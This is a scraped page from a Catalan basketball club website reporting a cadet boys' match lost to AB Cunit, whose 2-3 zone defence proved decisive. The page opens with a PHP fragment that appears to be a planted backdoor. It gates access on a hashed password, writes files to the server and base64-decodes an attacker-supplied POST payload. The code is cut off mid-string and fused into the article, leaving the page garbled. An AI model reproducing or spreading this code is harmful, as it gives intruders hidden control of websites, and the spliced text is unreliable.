function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La defensa en zona 2-3 de l'AB Cunit descentra el cadet masculí 03-04 (33-43) - Tgn Bàsquet Club -

La defensa en zona 2-3 de l’AB Cunit descentra el cadet masculí 03-04 (33-43)

Updated: novembre 20, 2018

El cadet masculí 03-04 va perdre contra l’AB Cunit en un partit que va ser un duel tàctic entre els dos entrenadors dels respectius equips. El conjunt visitant era el segon classificat de la lliga, demostrant una gran capacitat d’anotació. Després d’un primer quart que va ser un intercanvi de cistelles (10-13), els visitants van aprofitar un parell de badades defensives locals per arribar al descans amb avantatge (17-21). A la represa, el Cunit va plantejar una zona 2-3 que va descentrar el TGN Bàsquet que va estar mig estabornit durant tot el quart fins que un parell de cistelles finals el van mantenir dins del partit (23-31). En els últims deu minuts, els locals es van apropar (27-31) però el Cunit va tornar a plantejar la zona 2-3 i va marcar un parcial de 2-13 en els últims 7 minuts que va ser decisiu.